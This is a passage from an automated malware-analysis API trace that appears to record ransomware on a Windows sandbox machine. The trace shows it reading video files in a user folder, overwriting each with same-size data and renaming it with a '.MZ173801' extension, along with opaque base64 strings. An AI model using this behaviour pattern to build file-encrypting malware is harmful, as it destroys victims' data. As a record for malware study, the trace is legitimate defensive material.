ftLastWriteTime.dwHighDateTime=0x1d5f084, nFileSizeHigh=0x0, nFileSizeLow=0x3d17, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="OPD5PJn.avi", cAlternateFileName="")) returned 1 [0119.498] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.499] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.499] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\OPD5PJn.avi" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\opd5pjn.avi"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dd2e3c0, ftCreationTime.dwHighDateTime=0x1d5efef, ftLastAccessTime.dwLowDateTime=0x304d76b0, ftLastAccessTime.dwHighDateTime=0x1d5f084, ftLastWriteTime.dwLowDateTime=0x304d76b0, ftLastWriteTime.dwHighDateTime=0x1d5f084, nFileSizeHigh=0x0, nFileSizeLow=0x3d17)) returned 1 [0119.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.499] GetCurrentThreadId () returned 0x1358 [0119.499] GetCurrentThreadId () returned 0x1358 [0119.499] GetCurrentThreadId () returned 0x1358 [0119.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.500] GetCurrentThreadId () returned 0x1358 [0119.500] GetCurrentThreadId () returned 0x1358 [0119.500] GetCurrentThreadId () returned 0x1358 [0119.500] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\OPD5PJn.avi" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\opd5pjn.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0119.500] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0119.500] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0119.500] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x3d17 [0119.500] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0119.500] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3d17, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x3d17, lpOverlapped=0x0) returned 1 [0119.501] CloseHandle (hObject=0x3d0) returned 1 [0119.502] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\OPD5PJn.avi" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\opd5pjn.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0119.503] WriteFile (in: hFile=0x3d0, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x3d17, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f6f0*=0x3d17, lpOverlapped=0x0) returned 1 [0119.504] CloseHandle (hObject=0x3d0) returned 1 [0119.505] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\OPD5PJn.avi" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\opd5pjn.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\OPD5PJn.avi.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\opd5pjn.avi.mz173801")) returned 1 [0119.505] GetCurrentThreadId () returned 0x1358 [0119.505] GetCurrentThreadId () returned 0x1358 [0119.505] GetCurrentThreadId () returned 0x1358 [0119.505] GetCurrentThreadId () returned 0x1358 [0119.505] GetCurrentThreadId () returned 0x1358 [0119.505] GetCurrentThreadId () returned 0x1358 [0119.505] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61c67f90, ftCreationTime.dwHighDateTime=0x1d5e6dc, ftLastAccessTime.dwLowDateTime=0xd4a914f0, ftLastAccessTime.dwHighDateTime=0x1d5f023, ftLastWriteTime.dwLowDateTime=0xd4a914f0, ftLastWriteTime.dwHighDateTime=0x1d5f023, nFileSizeHigh=0x0, nFileSizeLow=0xa02c, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="p6BEEl6x9.mp4", cAlternateFileName="P6BEEL~1.MP4")) returned 1 [0119.505] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.506] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\p6BEEl6x9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\p6beel6x9.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61c67f90, ftCreationTime.dwHighDateTime=0x1d5e6dc, ftLastAccessTime.dwLowDateTime=0xd4a914f0, ftLastAccessTime.dwHighDateTime=0x1d5f023, ftLastWriteTime.dwLowDateTime=0xd4a914f0, ftLastWriteTime.dwHighDateTime=0x1d5f023, nFileSizeHigh=0x0, nFileSizeLow=0xa02c)) returned 1 [0119.506] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.506] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.506] GetCurrentThreadId () returned 0x1358 [0119.506] GetCurrentThreadId () returned 0x1358 [0119.506] GetCurrentThreadId () returned 0x1358 [0119.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.507] GetCurrentThreadId () returned 0x1358 [0119.507] GetCurrentThreadId () returned 0x1358 [0119.507] GetCurrentThreadId () returned 0x1358 [0119.507] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\p6BEEl6x9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\p6beel6x9.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0119.507] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0119.507] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0119.507] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xa02c [0119.507] SetFilePointer (in: hFile=0x3d0, 